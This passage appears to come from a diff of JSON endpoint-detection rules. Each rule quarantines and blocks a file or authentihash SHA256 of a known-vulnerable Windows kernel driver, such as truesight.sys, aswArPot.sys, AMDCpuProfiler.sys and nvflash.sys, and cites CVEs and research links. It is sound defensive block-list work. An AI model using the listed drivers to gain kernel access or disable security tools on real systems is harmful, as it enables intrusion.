+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617592Z",
+ "creation_date": "2026-03-23T11:45:29.617594Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617600Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8dca2ad045a9af1cdfc26d82fa7c581448aee098439fa21eee23d4c468a08560",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7f5d25b4-e381-5bdf-9af9-d88b207e31c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479953Z",
+ "creation_date": "2026-03-23T11:45:30.479956Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479963Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0285024823009ff4865ba119ebdd3712aa40406d33a45d9f93ef51525d20aa34",
+ "comment": "Vulnerable AMD uProf Kernel Driver (aka AMDCpuProfiler.sys) [CVE-2023-20562] [https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7f61805c-7dba-52bb-aa24-9c4285520e74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819054Z",
+ "creation_date": "2026-03-23T11:45:30.819056Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819061Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7036cd12dc9e3550239310fd8ff4f14e4266bbd0de3aba7b087068a253b506b",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7f786451-924c-51e6-9e42-39b847fdfc3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453223Z",
+ "creation_date": "2026-03-23T11:45:30.453227Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453237Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c859b3d11d2ff0049b644a19f3a316a8ca1a4995aa9c39991a7bde8d4f426a4",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7f8c58aa-4971-55f8-add3-a1bc39565f11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828759Z",
+ "creation_date": "2026-03-23T11:45:31.828761Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828767Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8aeaca6eadb98b98a453403b2e2051e1392da2b59b69ed0444661cd0db7fb3ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7f8ee504-40a9-59cb-872b-5b43b20f5bdb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970054Z",
+ "creation_date": "2026-03-23T11:45:29.970056Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970061Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d92b2f58c8fca3d3634b0c20578edd5004df571b29790690c97255e6096442c6",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7fa374c9-6e50-528d-b118-8040b020f22c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830240Z",
+ "creation_date": "2026-03-23T11:45:30.830242Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830248Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc246ddc41cfa6896e1a9a81bc1927ed04ab2a77ac45fadc50fa332cedfd26df",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7fad973a-0613-5512-9027-d42f16cb4155",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828790Z",
+ "creation_date": "2026-03-23T11:45:30.828792Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb89285f84fb13f7a5776abe89fe53303ee909d1b42b3bd7b89eb6b7429f429b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7fd9d383-48e9-5135-904e-7db00eb28243",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824512Z",
+ "creation_date": "2026-03-23T11:45:30.824515Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824522Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44e47c0a575abda6ced0dfcf4061eac2d01b229bd04bce7c760466d638c7b5d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7fe759aa-0c6e-522f-8f57-c460d3716321",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830383Z",
+ "creation_date": "2026-03-23T11:45:31.830386Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830394Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b368de498601571722e619cf2fd65007c24351120687e1b887086db2482e0021",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ff1d88f-c986-5d33-a3e3-d9efca2affa8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498495Z",
+ "creation_date": "2026-03-23T11:45:31.498498Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498507Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d3b620b41cd43c1feeadb5cdd8e9668b8b68c6bcbdfde5c5d7ad10baa05349e5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ffd1aa0-839a-581e-a7c5-6ffc7089c546",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618859Z",
+ "creation_date": "2026-03-23T11:45:29.618861Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618866Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae7d7d8a5bc48f2fb1dc81806a5eed52c3efc487cfdc8737d3ea3970dca7ce27",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80000f78-d503-5a0d-a3c9-530804b7ce0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975752Z",
+ "creation_date": "2026-03-23T11:45:29.975754Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975759Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6aa427e7230a2b077bfecade35ffff67b2f15c051cf92fd207a3412c747f83c3",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8000d607-a865-5207-83a1-a7a95cf66aeb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473796Z",
+ "creation_date": "2026-03-23T11:45:31.473800Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473811Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0d7e6e23fc631ed0c11093706346317f4f595791e47a8181a0ef633e5756faa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "800cf905-22be-544b-b07c-87fb3574f920",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819743Z",
+ "creation_date": "2026-03-23T11:45:30.819745Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819750Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae3a6a0726f667658fc3e3180980609dcb31bdbf833d7cb76ba5d405058d5156",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8011e70b-92dc-56c8-ad91-7b83c970a2d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153524Z",
+ "creation_date": "2026-03-23T11:45:31.153526Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153532Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0878201bd1efa4c49a78d317d80a63778e501f4047e2d21784692a88ab2eb2d8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "80337d1f-2212-5313-b400-21e2c955bae3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621863Z",
+ "creation_date": "2026-03-23T11:45:29.621865Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621883Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e955e57f078a2c0de7d113e85859bb3e0fcac772a5a1b9b9709a90a86ef4cd5",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "803707d2-e087-506b-9f1a-dd84f971aca8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828333Z",
+ "creation_date": "2026-03-23T11:45:31.828336Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828344Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "258d710911124ef857fd95e17754327c18442364a35c102f7e9fcb9fe4a1dbfb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8037e9f8-2545-5978-8b6b-d11783d02a08",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824421Z",
+ "creation_date": "2026-03-23T11:45:30.824423Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824428Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e344e75f109f239594ef460dd71465830f14eb4c6001a9d36af76ccc51ed7cc7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8040f2f3-c2a7-529d-a564-9e9f9b123ba3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826367Z",
+ "creation_date": "2026-03-23T11:45:31.826369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826374Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d217c8e84ce38732611fdd26a28f0a1f5d216b885ea3650d6c70d107c9dd44db",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8041b3a8-dea2-5c12-95f7-2c3c144ee9b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969888Z",
+ "creation_date": "2026-03-23T11:45:29.969890Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8b5fddf52551259d7d936283aa4fdc4579c5e4b030a11267496cdbdc143e15b",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8043e944-c2f3-531c-a4e6-5b0031bdd650",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808294Z",
+ "creation_date": "2026-03-23T11:45:31.808297Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808306Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32a53835967cc3690dede58d9e7e006cfda9730e26418a6a37750a7bc6a07d6f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8058a5f6-dc8e-5f28-b2cd-4eab04b54784",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
